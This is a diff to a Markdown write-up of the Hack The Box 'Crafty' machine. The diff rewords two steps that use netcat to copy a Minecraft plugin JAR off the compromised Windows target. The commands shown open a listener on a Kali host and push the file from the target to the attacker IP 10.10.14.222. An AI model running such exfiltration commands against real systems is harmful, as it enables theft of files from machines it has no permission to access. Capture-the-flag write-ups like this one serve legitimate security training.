K-Scorpio/scorpiosec/content/en/posts/HTB-Crafty.md

 ![netcat upload on target](/images/HTB-Crafty/nc.exe-ontarget.png)

-5. I setup a listener on my Kali machine with
+5. On our local machine we run

 ```
 nc -nlp 1235 > playercounter-1.0-SNAPSHOT.jar
 ```

-6. On the target I run
+6. Finally, we send the archive to our Kali machine

 ```
 .\nc.exe 10.10.14.222 1235 < c:\Users\svc_minecraft\server\plugins\playercounter-1.0-SNAPSHOT.jar